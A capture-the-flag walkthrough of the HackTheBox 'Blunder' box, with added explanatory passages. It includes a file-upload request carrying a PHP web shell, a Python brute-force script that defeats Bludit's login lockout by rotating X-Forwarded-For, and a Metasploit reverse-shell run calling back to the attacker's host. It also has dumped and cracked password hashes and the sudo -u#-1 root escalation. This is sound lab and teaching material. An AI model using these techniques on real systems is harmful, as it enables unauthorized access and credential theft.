Recon

Starting with an nmap scan:

nmap -A 10.10.10.191 -o nmap
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-31 17:45 +0545
Nmap scan report for 10.10.10.191
Host is up (0.38s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
21/tcp closed ftp
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts
Aggressive OS guesses: HP P2000 G3 NAS device (91%), Linux 2.6.32 (90%), Infomir MAG-250 set-top box (90%), Ubiquiti AirMax NanoStation WAP (Linux 2.6.32) (90%), Linux 3.7 (90%), Netgear RAIDiator 4.2.21 (Linux 2.6.37) (90%), Linux 2.6.32 - 3.13 (89%), Linux 3.0 - 3.2 (89%), Linux 3.3 (89%), Linux 2.6.32 - 3.1 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TRACEROUTE (using port 21/tcp)
HOP RTT ADDRESS
1 309.94 ms 10.10.14.1
2 395.75 ms 10.10.10.191
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.67 seconds

We see only one port open, 80, which makes it really interesting (21/ftp reports as closed rather than filtered, which is worth noting). But, I think I should run a full port scan, so that we don't miss anything:

nmap -p- -A -T4 10.10.10.191 -o allports

In the meantime, let's look at the website and also run some content discovery on it in the background.

ffuf -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://10.10.10.191/FUZZ -t 500

Now, looking around at the website and viewing the source, we see some JS files whose path looks interesting. Looking at the URL http://10.10.10.191/bl-kernel/js/jquery.min.js, it sits a few directories deep, so let's see if we can list the contents of those directories:

http://10.10.10.191/bl-kernel/js/
http://10.10.10.191/bl-kernel/

Here, we can see a lot of interesting files. Looking at those files, we can find out that it is running Bludit CMS.

Coming back to ffuf, we see:

.htaccess               [Status: 403, Size: 277, Words: 20, Lines: 10]
.htpasswd               [Status: 403, Size: 277, Words: 20, Lines: 10]
LICENSE                 [Status: 200, Size: 1083, Words: 155, Lines: 22]
about                   [Status: 200, Size: 3280, Words: 225, Lines: 106]
admin                   [Status: 301, Size: 0, Words: 1, Lines: 1]
cgi-bin/                [Status: 301, Size: 0, Words: 1, Lines: 1]
robots.txt              [Status: 200, Size: 22, Words: 3, Lines: 2]
server-status           [Status: 403, Size: 277, Words: 20, Lines: 10]
usb                     [Status: 200, Size: 3959, Words: 304, Lines: 111]

Let's check them out. At /admin we see a login portal. Trying admin:admin, of course, doesn't get us in.

Now, let's see if there are any public exploits for Bludit CMS. As this box is tagged heavily as CTF-like and CVE-based, I'm hoping we can find one. Also, our all-ports scan has finished and no other ports are open.

searchsploit Bludit

We see that there are these two exploits:

Bludit - Directory Traversal Image File Upload (Metasploit)
bludit Pages Editor 3.0.0 - Arbitrary File Upload

Let's check out the non-Metasploit one first:

cp /usr/share/exploitdb/exploits/php/webapps/46060.txt .
cat 46060.txt
# Exploit Title: bludit Pages Editor 3.0.0 - Arbitrary File Upload
# Date: 2018-10-02
# Google Dork: N/A
# Exploit Author: BouSalman
# Vendor Homepage: https://www.bludit.com/
# Software Link: N/A
# Version: 3.0.0
# Tested on: Ubuntu 18.04
# CVE : 2018-1000811

POST /admin/ajax/upload-files HTTP/1.1
Host: 192.168.140.154
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.140.154/admin/new-content
X-Requested-With: XMLHttpRequest
Content-Length: 415
Content-Type: multipart/form-data; boundary=---------------------------26228568510541774541866388118
Cookie: BLUDIT-KEY=5s634f6up72tmfi050i4okunf9
Connection: close

-----------------------------26228568510541774541866388118
Content-Disposition: form-data; name="tokenCSRF"

67987ea926223b28949695d6936191d28d320f20
-----------------------------26228568510541774541866388118
Content-Disposition: form-data; name="bluditInputFiles[]"; filename="poc.php"
Content-Type: image/png

<?php system($_GET["cmd"]);?>
-----------------------------26228568510541774541866388118--

Okay, that looks promising. Let's try the Metasploit module first, as it is easier, and if that doesn't work, we will come back to this one.

msfconsole
search bludit
use exploit/linux/http/bludit_upload_images_exec
options

Looking at the options, we need credentials for this; it is an authenticated exploit:

BLUDITPASS yes The password for Bludit 
BLUDITUSER yes The username for Bludit

As of right now, we don't have any credentials, which is sad. We will get back to this later if we find the credentials.

Let's try opening up Burp and sending the request from our previous exploit and see if that works.

Going to the Repeater tab, and sending that request:

POST /admin/ajax/upload-files HTTP/1.1
Host: 10.10.10.191
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.191/admin/new-content
X-Requested-With: XMLHttpRequest
Content-Length: 415
Content-Type: multipart/form-data; boundary=---------------------------26228568510541774541866388118
Cookie: BLUDIT-KEY=5s634f6up72tmfi050i4okunf9
Connection: close

-----------------------------26228568510541774541866388118
Content-Disposition: form-data; name="tokenCSRF"

67987ea926223b28949695d6936191d28d320f20
-----------------------------26228568510541774541866388118
Content-Disposition: form-data; name="bluditInputFiles[]"; filename="poc.php"
Content-Type: image/png

<?php system($_GET["cmd"]);?>
-----------------------------26228568510541774541866388118--

We get "User not Logged In!". The BLUDIT-KEY cookie and tokenCSRF copied from the PoC belong to the PoC author's session, not ours, so the endpoint rejects the request. It seems we will need to find credentials somewhere.

Let's try content discovery again, but this time, let's add a few more extensions.

ffuf -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://10.10.10.191/FUZZ -t 500 -e .php,.txt,.html

And this time we find something new, todo.txt. Let's check it out: http://10.10.10.191/todo.txt

Update the CMS
-Turn off FTP - DONE
-Remove old users - DONE
-Inform fergus that the new blog needs images - PENDING

Nice, that gives us a username: fergus.

Googling for "Bludit Login Bypass" I found this blog post, which was of great help: https://rastating.github.io/bludit-brute-force-mitigation-bypass/

The trick it describes: Bludit's login throttling keys failed attempts on the client IP, but it takes that IP from the X-Forwarded-For header when one is present, so sending a fresh header value with every request means no single "IP" ever reaches the lockout threshold. We will need to modify the script for our target (host, username and wordlist).

import re
import requests

host = 'http://10.10.10.191'
login_url = host + '/admin/login'
username = 'fergus'
wordlist = []

# Candidate passwords, generated from the site itself with cewl.
with open("blundercewl_wordlist.txt", "r", errors="ignore") as file:
    for line in file:
        wordlist.append(line.rstrip())

for password in wordlist:
    # Fresh session per attempt; the login form needs a valid tokenCSRF.
    session = requests.Session()
    login_page = session.get(login_url)
    csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)

    print('[*] Trying: {p}'.format(p = password))

    # Bludit keys its failed-login blacklist on the IP it reads from
    # X-Forwarded-For, so a unique value per request never trips the lockout.
    # The candidate password is simply reused as that unique value.
    headers = {
        'X-Forwarded-For': password,
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
        'Referer': login_url
    }

    data = {
        'tokenCSRF': csrf_token,
        'username': username,
        'password': password,
        'save': ''
    }

    # A successful login answers with a redirect to the dashboard.
    login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)

    if 'location' in login_result.headers:
        if '/admin/dashboard' in login_result.headers['location']:
            print()
            print('SUCCESS: Password found!')
            print('Use {u}:{p} to login.'.format(u = username, p = password))
            print()
            break
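To make clear why the rotating header works, here is an added, self-contained model of the lockout logic the linked post describes. It is not Bludit's code and not part of the original writeup: a small in-memory "server" that counts failed logins per client IP, in a vulnerable variant that trusts X-Forwarded-For (and Client-IP) over the socket address, and a hardened variant that only uses the socket address. The threshold of 10 and the 10.10.14.21 source address are assumptions; the wordlist is constructed.

```python
# Added illustration: why a rotating X-Forwarded-For header defeats a lockout
# that keys failed attempts on a header-supplied client IP. Simplified model of
# the behaviour described in the linked post, not Bludit's own code.
from dataclasses import dataclass, field

FAILURES_ALLOWED = 10         # assumed to mirror Bludit's default numberFailuresAllowed
REMOTE_ADDR = "10.10.14.21"   # our real source address, as seen on the socket (assumed)


@dataclass
class Lockout:
    # True  = vulnerable: a header value wins over the socket address
    # False = hardened: only the socket address is used
    trust_forwarded_header: bool
    failures: dict = field(default_factory=dict)

    def client_ip(self, remote_addr, headers):
        if self.trust_forwarded_header:
            for name in ("X-Forwarded-For", "Client-IP"):
                if headers.get(name):
                    return headers[name]   # never validated: any string counts as an "IP"
        return remote_addr

    def is_blocked(self, remote_addr, headers):
        return self.failures.get(self.client_ip(remote_addr, headers), 0) >= FAILURES_ALLOWED

    def record_failure(self, remote_addr, headers):
        ip = self.client_ip(remote_addr, headers)
        self.failures[ip] = self.failures.get(ip, 0) + 1


def attempt_login(lockout, headers, password, real_password):
    """One login attempt against the simulated server; returns the outcome."""
    if lockout.is_blocked(REMOTE_ADDR, headers):
        return "blocked"
    if password == real_password:
        return "success"
    lockout.record_failure(REMOTE_ADDR, headers)
    return "failed"


def run_bruteforce(lockout, wordlist, real_password, spoof):
    """Try every word; with spoof=True send a unique X-Forwarded-For per request,
    reusing the candidate password as the header value like the script above."""
    outcomes = []
    for candidate in wordlist:
        headers = {"X-Forwarded-For": candidate} if spoof else {}
        outcomes.append(attempt_login(lockout, headers, candidate, real_password))
        if outcomes[-1] == "success":
            break
    return outcomes


# Constructed wordlist: 29 wrong guesses, the real password last.
WORDLIST = [f"guess{i}" for i in range(29)] + ["RolandDeschain"]

if __name__ == "__main__":
    for trust, spoof in ((True, False), (True, True), (False, True)):
        result = run_bruteforce(Lockout(trust), WORDLIST, "RolandDeschain", spoof)
        print(f"trust_header={trust} spoof={spoof}: "
              f"{result.count('failed')} failed, {result.count('blocked')} blocked, "
              f"success={'success' in result}")
```

Without the header the tenth failure locks our real address out and every later attempt is rejected before the password is even compared; with a unique header per request the counter never exceeds 1 for any key and the last word logs in. The hardened variant ignores the header entirely, so spoofing buys nothing. The fix is simply never to derive a security decision from a client-controlled header unless a trusted reverse proxy is known to set it.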

And the wordlist that we will use to go along with this is blundercewl_wordlist.txt, which we will create now with cewl, scraping the site itself for words of at least 8 characters:

cewl http://10.10.10.191/ -m 8 -w blundercewl_wordlist.txt

Now, let's run this:

python bruteforce.py

After a while, we get a password: RolandDeschain

Now, let's try that Metasploit module:

msfconsole
use exploit/linux/http/bludit_upload_images_exec
set rhosts 10.10.10.191
set bludituser fergus
set bluditpass RolandDeschain
set payload php/meterpreter/reverse_tcp
set lhost 10.10.14.21
run

And we get a meterpreter shell! Nice. This is probably the first time that I've used a meterpreter shell.

Now, looking at /home we see that there are two users, hugo and shaun.

However, before we move on, I will close this session and rerun this exploit, this time by passing it through Burp to understand what it does.

We will use all the previous options but add:

set proxies http://127.0.0.1:8080/
set ReverseAllowProxy true

Analyzing the traffic in Burp, we see that:

  1. It logs into the Dashboard.
  2. Then uploads a php reverse meterpreter shell as an image giving us a meterpreter shell.

After looking around at the files, I reached /var/www/bludit-3.9.2/bl-content/databases, where Bludit keeps its flat-file JSON databases, including the user table:

cd /var/www/bludit-3.9.2/bl-content/databases
ls
cat users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
  "admin": {
    "nickname": "Admin",
    "firstName": "Administrator",
    "lastName": "",
    "role": "admin",
    "password": "bfcc887f62e36ea019e3295aafb8a3885966e265",
    "salt": "5dde2887e7aca",
    "email": "",
    "registered": "2019-11-27 07:40:55",
    "tokenRemember": "",
    "tokenAuth": "b380cb62057e9da47afce66b4615107d",
    "tokenAuthTTL": "2009-03-15 14:00",
    "twitter": "",
    "facebook": "",
    "instagram": "",
    "codepen": "",
    "linkedin": "",
    "github": "",
    "gitlab": ""
  },
  "fergus": {
    "firstName": "",
    "lastName": "",
    "nickname": "",
    "description": "",
    "role": "author",
    "password": "be5e169cdf51bd4c878ae89a0a89de9cc0c9d8c7",
    "salt": "jqxpjfnv",
    "email": "",
    "registered": "2019-11-27 13:26:44",
    "tokenRemember": "",
    "tokenAuth": "0e8011811356c0c5bd2211cba8c50471",
    "tokenAuthTTL": "2009-03-15 14:00",
    "twitter": "",
    "facebook": "",
    "codepen": "",
    "instagram": "",
    "github": "",
    "gitlab": "",
    "linkedin": "",
    "mastodon": ""
  }
}

Here, we have the salted hashes for admin and fergus. Nice. There is a second, newer Bludit install next to this one, bludit-3.10.0a, so let's see what its user database holds.

cd /var/www/bludit-3.10.0a/bl-content/databases
cat users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
  "admin": {
    "nickname": "Hugo",
    "firstName": "Hugo",
    "lastName": "",
    "role": "User",
    "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
    "email": "",
    "registered": "2019-11-27 07:40:55",
    "tokenRemember": "",
    "tokenAuth": "b380cb62057e9da47afce66b4615107d",
    "tokenAuthTTL": "2009-03-15 14:00",
    "twitter": "",
    "facebook": "",
    "instagram": "",
    "codepen": "",
    "linkedin": "",
    "github": "",
    "gitlab": ""
  }
}

Before we move on to cracking, let's check the users that are present in this machine.

ls /home
hugo shaun

As we already have the password hash of Hugo, let's try to identify it and then crack it.

hash-identifier
faca404fd5c0a31cf1897b823c695c85cffeb98d

Putting it into hash-identifier, it suggests that it might be SHA1 (40 hex characters). Note that, unlike the 3.9.2 entries, this one has no salt field, so it is a plain SHA-1 of the password and a lookup table can find it. The salted 3.9.2 hashes are sha1(password + salt) and would need to be brute-forced with the salt instead.

I'm really bad at cracking passwords and crypto stuff, so, I'll try using https://crackstation.net

Copy and paste that hash there, and it gives us the password: Password120
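For anyone who wants to do this offline rather than via CrackStation, here is an added example, not from the original writeup, that parses a Bludit users.php (the PHP guard line followed by JSON), reproduces Bludit's sha1(password + salt) scheme, and runs a small dictionary check against the entries above. The users.php strings are constructed from the two dumps shown (trimmed to the fields that matter) and the wordlist is constructed; the hash values are the ones from the page.

```python
# Added example: offline verification of Bludit users.php password hashes.
# Not the writeup's code. Hash/salt values are the ones shown on the page;
# the users.php blobs and the wordlist are constructed for the demo.
import hashlib
import json

USERS_PHP_3_9_2 = """<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{"fergus": {"role": "author", "password": "be5e169cdf51bd4c878ae89a0a89de9cc0c9d8c7", "salt": "jqxpjfnv"}}
"""

USERS_PHP_3_10_0A = """<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{"admin": {"nickname": "Hugo", "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d"}}
"""

# Constructed wordlist; a real run would use the cewl output or rockyou.
WORDLIST = ["admin", "blunder", "Password120", "RolandDeschain"]


def parse_users_php(contents: str) -> dict:
    """Drop Bludit's PHP guard line (first line) and load the JSON user table."""
    _, _, body = contents.partition("\n")
    return json.loads(body)


def bludit_hash(password: str, salt: str = "") -> str:
    """Bludit stores sha1(password . salt); an entry without a salt is plain sha1."""
    return hashlib.sha1((password + salt).encode()).hexdigest()


def verify(password: str, entry: dict) -> bool:
    """True if the candidate password reproduces the stored hash for this user entry."""
    return bludit_hash(password, entry.get("salt", "")) == entry["password"]


def crack(users: dict, wordlist) -> dict:
    """Dictionary attack over every user; returns {username: password} for the hits."""
    found = {}
    for name, entry in users.items():
        for candidate in wordlist:
            if verify(candidate, entry):
                found[name] = candidate
                break
    return found


if __name__ == "__main__":
    for label, blob in (("bludit-3.9.2", USERS_PHP_3_9_2), ("bludit-3.10.0a", USERS_PHP_3_10_0A)):
        print(label, crack(parse_users_php(blob), WORDLIST))
```

The unsalted 3.10.0a entry is exactly why a precomputed lookup table found Password120 instantly; the same function applied to the salted 3.9.2 entries needs the salt appended to each guess, which is what a hashcat run in sha1($pass.$salt) mode would do. Salts per user are what make the table attack useless against the admin hash.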

Now, let's try to switch user to Hugo. Before that, we have to drop from Meterpreter into a normal shell and upgrade it to a proper TTY:

shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm-256color
export SHELL=bash
su - hugo

And entering the password Password120 we get a shell as Hugo! Nice!

PrivEsc

Before we do anything, let's check our sudo permissions:

sudo -l
Matching Defaults entries for hugo on blunder: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User hugo may run the following commands on blunder: (ALL, !root) /bin/bash

So, it seems like we can execute /bin/bash as any user except for root.

After a little bit of googling, I found this really nice trick to use sudo to get root. It is CVE-2019-14287, which affects sudo before 1.8.28 (check with sudo -V): sudo's policy check compares the requested uid against root's 0, so -1 passes the !root exclusion, but setresuid() treats -1 as "leave unchanged", so the process keeps sudo's uid 0.

sudo -u#-1 /bin/bash

And, now, you should be root!
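To make the two halves of that bypass concrete, here is an added example, not from the writeup and not sudo's code: a small model of the (ALL, !root) policy check as sudo evaluated it before 1.8.28 beside the patched check, the setresuid(2) "-1 means unchanged" rule, and one real setresuid(-1, -1, -1) call to show the kernel really does treat it as a no-op. The UID_T_MAX constant assumes a 32-bit uid_t.

```python
# Added illustration of the sudo -u#-1 bypass (CVE-2019-14287). A model of the
# two checks involved, not sudo's own code, plus one real syscall for the
# kernel half of the story.
import os
from typing import Optional

UID_T_MAX = 2**32 - 1   # what -1 becomes once stored in an unsigned 32-bit uid_t (assumed)


def vulnerable_policy_allows(requested_uid: int) -> bool:
    """(ALL, !root) as sudo < 1.8.28 evaluated it: any target uid other than 0 passes."""
    return requested_uid != 0


def fixed_policy_allows(requested_uid: int) -> bool:
    """sudo 1.8.28 additionally refuses -1 and UID_MAX as target ids."""
    return requested_uid not in (0, -1, UID_T_MAX)


def uid_after_setresuid(current_uid: int, requested_uid: int) -> int:
    """setresuid(2) treats an argument of -1 as 'leave this id unchanged'."""
    if requested_uid in (-1, UID_T_MAX):
        return current_uid
    return requested_uid


def resulting_uid(requested_uid: int, policy=vulnerable_policy_allows) -> Optional[int]:
    """Uid the spawned shell ends up with, or None if sudo refuses the request.
    sudo is setuid-root, so it is uid 0 when it calls setresuid()."""
    if not policy(requested_uid):
        return None
    return uid_after_setresuid(0, requested_uid)


def setresuid_minus_one_is_noop() -> Optional[bool]:
    """Real kernel behaviour: setresuid(-1, -1, -1) succeeds for any process and
    changes nothing. Returns None on platforms without setresuid (e.g. macOS)."""
    if not hasattr(os, "setresuid"):
        return None
    before = os.getuid()
    os.setresuid(-1, -1, -1)
    return os.getuid() == before


if __name__ == "__main__":
    print("sudo -u#1000 ->", resulting_uid(1000))                  # 1000, as intended
    print("sudo -u#0    ->", resulting_uid(0))                     # None, blocked by !root
    print("sudo -u#-1   ->", resulting_uid(-1))                    # 0: passes !root, setresuid ignores it
    print("patched      ->", resulting_uid(-1, fixed_policy_allows))  # None
    print("setresuid(-1,-1,-1) no-op:", setresuid_minus_one_is_noop())
```

The policy layer and the kernel disagree about what -1 means, and the attacker sits in the gap: the rule author wrote "anyone but root", the comparison saw a non-zero number, and the kernel saw "don't change anything" while sudo was still root. Denylist-style sudo rules (ALL, !root) are fragile for exactly this reason; an allowlist of the specific target users is the safer way to express the intent.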